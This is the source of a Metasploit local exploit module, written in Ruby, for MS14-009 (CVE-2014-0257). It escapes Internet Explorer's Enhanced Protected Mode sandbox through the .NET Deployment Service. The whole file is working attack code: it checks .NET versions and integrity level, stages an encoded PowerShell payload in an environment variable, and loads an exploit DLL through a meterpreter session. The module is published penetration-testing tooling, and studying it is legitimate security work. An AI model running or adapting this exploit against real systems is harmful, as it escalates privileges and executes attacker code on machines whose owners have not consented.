## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell include Msf::Exploit::EXE include Msf::Post::Windows::Priv include Msf::Post::Windows::FileInfo include Msf::Post::File NET_VERSIONS = { '4.5' => { 'dfsvc' => '4.0.30319.17929.17', 'mscorlib' => '4.0.30319.18063.18' }, '4.5.1' => { 'dfsvc' => '4.0.30319.18408.18', 'mscorlib' => '4.0.30319.18444.18' } } def initialize(info={}) super( update_info( info, 'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape', 'Description' => %q{ This module abuses a process creation policy in Internet Explorer's sandbox, specifically in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the Enhanced Protected Mode, and execute code with Medium Integrity. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # Vulnerability Discovery and original exploit code 'juan vazquez' # metasploit module ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'IE 8 - 11', { } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DisclosureDate'=> "Feb 11 2014", 'References' => [ ['CVE', '2014-0257'], ['MSB', 'MS14-009'], ['BID', '65417'], ['URL', 'https://github.com/tyranid/IE11SandboxEscapes'] ] )) end def check unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") return Exploit::CheckCode::Unknown end net_version = get_net_version if net_version.empty? return Exploit::CheckCode::Unknown end unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") return Exploit::CheckCode::Detected end mscorlib_version = get_mscorlib_version if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"]) return Exploit::CheckCode::Safe end Exploit::CheckCode::Appears end def get_net_version net_version = "" dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") dfsvc_version = dfsvc_version.join(".") NET_VERSIONS.each do |k,v| if v["dfsvc"] == dfsvc_version net_version = k end end net_version end def get_mscorlib_version mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") mscorlib_version.join(".") end def exploit print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil? mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe') if mod_handle['return'] == 0 fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process") end unless get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NotVulnerable, "Not running at Low Integrity") end print_status("Searching .NET Deployment Service (dfsvc.exe)...") unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found") end net_version = get_net_version if net_version.empty? fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1") end print_good(".NET Deployment Service from .NET #{net_version} found.") print_status("Checking if .NET is patched...") unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)") end mscorlib_version = get_mscorlib_version if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"]) fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable") end print_good(".NET looks vulnerable, exploiting...") cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { :remove_comspec => true } ) cmd.gsub!('powershell.exe ','') session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) temp = get_env('TEMP') print_status("Loading Exploit Library...") session.core.load_library( 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"), 'TargetFilePath' => temp + "\\CVE-2014-0257.dll", 'UploadLibrary' => true, 'Extension' => false, 'SaveToDisk' => false ) end def cleanup session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) super end end